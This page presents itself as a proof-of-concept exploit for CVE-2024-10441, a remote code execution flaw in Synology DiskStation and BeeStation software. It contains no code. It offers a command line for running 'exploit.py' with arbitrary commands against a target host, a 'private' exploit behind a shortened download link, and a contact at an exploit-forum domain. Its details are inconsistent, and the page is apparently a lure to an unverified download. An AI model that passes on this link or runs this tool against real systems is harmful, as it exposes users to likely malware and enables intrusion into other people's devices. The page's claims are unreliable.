CVE-2024-10441 PoC — Synology DiskStation Manager (DSM) and Synology BeeStation Manager Security Vulnerability

Source
Associated Vulnerability
Title: Synology DiskStation Manager (DSM) and Synology BeeStation Manager Security Vulnerability (CVE-2024-10441)
Description: Improper encoding or escaping of output vulnerability in the system plugin daemon in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allows remote attackers to execute arbitrary code via unspecified vectors.
Readme
# Improper Encoding or Escaping of Output (CVE-2024-10441)

## Overview

An improper encoding or escaping of output vulnerability exists in the system plugin daemon of Synology products, specifically affecting BeeStation Manager (BSM), DiskStation Manager (DSM), and Unified Controller (DSMUC). The vulnerability allows remote attackers to execute arbitrary code through unspecified attack vectors.



## Details

- **CVE ID**: [CVE-2024-10441](https://nvd.nist.gov/vuln/detail/CVE-2024-10441)  
- **Discovered**: 2025-03-17
- **Published**: 2025-03-18
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

Improper encoding or escaping of output vulnerability in the system plugin daemon in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allows remote attackers to execute arbitrary code via unspecified vectors.

## Affected Versions

Synology BeeStation OS (BSM) before 1.1-65374

Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1


## Running

To run the exploit, you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **cybersecuritist@exploit.in**

## Exploit:
### [Download here](https://bit.ly/43ApbAH)

